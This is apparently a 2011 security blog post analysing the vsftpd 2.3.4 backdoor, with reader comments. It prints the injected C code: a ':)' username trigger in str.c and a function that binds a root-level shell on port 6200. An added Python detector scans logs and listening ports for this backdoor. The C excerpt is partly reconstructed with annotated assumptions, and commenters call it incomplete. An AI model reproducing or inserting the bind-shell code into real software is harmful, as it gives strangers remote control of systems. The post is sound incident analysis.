xorl %eax, %eax

vsftpd 2.3.4 Backdoor

with 4 comments

This was a recent discovery by Chris Evans, and you can read more details in his blog post. Furthermore, you can find information about this incident on The H Open as well as LWN.net.

So, the backdoor specifically affects version 2.3.4 of the popular FTP daemon and can be found in str.c, the file that contains the string manipulation routines.

int str_contains_line(const struct mystr* p_str, const struct mystr* p_line_str)
{
  static struct mystr s_curr_line_str;
  unsigned int pos = 0;
  unsigned int i = 0; /* declaration missing from the excerpt as posted; assumed here so it compiles */
  while (str_getline(p_str, &s_curr_line_str, &pos))
  {
    if (str_equal(&s_curr_line_str, p_line_str))
      return 1;
    /* the backdoor check: 0x3a 0x29 is ":)" */
    else if ((p_str->p_buf[i] == 0x3a)
             && (p_str->p_buf[i + 1] == 0x29))
    {
      vsf_sysutil_extra();
    }
  }
  return 0;
}

Quite obvious. While parsing the received string values, if the string begins with “\x3A\x29”, which in ASCII is ‘:)’ (a smiley face), it invokes vsf_sysutil_extra().

The backdoor function itself was placed in sysdeputil.c and looks like this (excerpt, as posted):

int vsf_sysutil_extra(void)
{
  int fd, rfd;
  struct sockaddr_in sa;
  if ((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    exit(1);                          /* exit dropped in the posted excerpt; matches the other two checks */
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(6200);          /* the backdoor port */
  sa.sin_addr.s_addr = INADDR_ANY;    /* listens on every interface */
  if ((bind(fd, (struct sockaddr *)&sa, sizeof(struct sockaddr))) < 0)
    exit(1);
  if ((listen(fd, 100)) == -1)
    exit(1);
  for (;;)                            /* loop implied by the indentation of the posted excerpt */
  {
    rfd = accept(fd, 0, 0);
    close(0); close(1); close(2);                 /* drop stdin/stdout/stderr ... */
    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);     /* ... and point them at the accepted connection */
    execl("/bin/sh", "sh", (char *)0);            /* hand that connection a shell */
  }
}

It simply opens a TCP socket listening on port 6200 and spawns a shell for whoever connects to that port.

So, by using ‘:)’ as the username, attackers were able to trigger this backdoor in vsftpd 2.3.4.
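As an added defender-side example (not code from the original post, and not part of vsftpd), the following Python scans vsftpd.log lines written with log_ftp_protocol=YES for USER commands carrying the ‘:)’ byte pair, and checks ss -lnt output for a listener on the backdoor port. Both inputs are constructed samples; the "FTP command: Client ..." line layout follows vsftpd's protocol logging as I recall it and is an assumption, as are the IPs and PIDs.

```python
import re

# Byte pair the backdoored str.c looks for: 0x3a 0x29 == ":)"
TRIGGER = ":)"
# Port the injected vsf_sysutil_extra() binds its shell to
BACKDOOR_PORT = 6200

# Constructed sample of vsftpd.log with log_ftp_protocol=YES (not real log data;
# line layout assumed)
SAMPLE_LOG = """\
Mon Jul  4 10:01:02 2011 [pid 4242] CONNECT: Client "192.0.2.10"
Mon Jul  4 10:01:03 2011 [pid 4242] FTP command: Client "192.0.2.10", "USER alice"
Mon Jul  4 10:01:05 2011 [pid 4243] CONNECT: Client "198.51.100.7"
Mon Jul  4 10:01:06 2011 [pid 4243] FTP command: Client "198.51.100.7", "USER X:)"
Mon Jul  4 10:01:07 2011 [pid 4244] FTP command: Client "203.0.113.9", "USER bob"
"""

# Constructed sample of `ss -lnt` output from a host where the shell listener is up
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       32      0.0.0.0:21          0.0.0.0:*
LISTEN  0       100     0.0.0.0:6200        0.0.0.0:*
"""

USER_CMD = re.compile(r'FTP command: Client "(?P<ip>[^"]+)", "USER (?P<user>[^"]*)"')


def find_trigger_attempts(log_text):
    """Return (client_ip, username) for every USER command containing ':)'.

    Any occurrence inside the username is reported, not only a leading one,
    so usernames such as "X:)" (see the comments on the post) are caught too.
    """
    hits = []
    for line in log_text.splitlines():
        m = USER_CMD.search(line)
        if m and TRIGGER in m.group("user"):
            hits.append((m.group("ip"), m.group("user")))
    return hits


def listener_on_backdoor_port(ss_text, port=BACKDOOR_PORT):
    """True if any LISTEN line's local address ends in :<port>."""
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        local = fields[3]
        # rsplit on the last colon handles both "0.0.0.0:6200" and "[::]:6200"
        try:
            if int(local.rsplit(":", 1)[1]) == port:
                return True
        except (IndexError, ValueError):
            continue
    return False


if __name__ == "__main__":
    for ip, user in find_trigger_attempts(SAMPLE_LOG):
        print(f"trigger attempt from {ip}: USER {user!r}")
    print("backdoor port listening:", listener_on_backdoor_port(SAMPLE_SS))
```

A login attempt carrying the trigger is worth an alert on its own, whether or not the host runs the tampered build, since nobody types a smiley as a username by accident; the port check is the quick way to tell whether such an attempt actually succeeded.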

Written by xorl

July 5, 2011 at 03:54

Posted in hax, security

4 Responses


  1. Minor quibble; the username has to start with a valid username character and anonymous-only mode must not be enabled. For example “X:)” works, but “:)” or “X :)” does not.


    July 6, 2011 at 17:11

  2. @HD: Thanks for the correction. :)


    July 6, 2011 at 19:06

  3. Excellent!
    I saw this article and I was like “Holy shit, I can’t believe that xorl is gonna talk about this fucking trivial backdoor” and you did.

    And not only that, you also managed to make a mistake.

    Great man!
    Keep it going!


    July 6, 2011 at 21:30

  4. Hi,
    the backdoor code is not complete, since the i variable in function str_contains_line is not defined. What is the true code?


    July 10, 2014 at 23:03
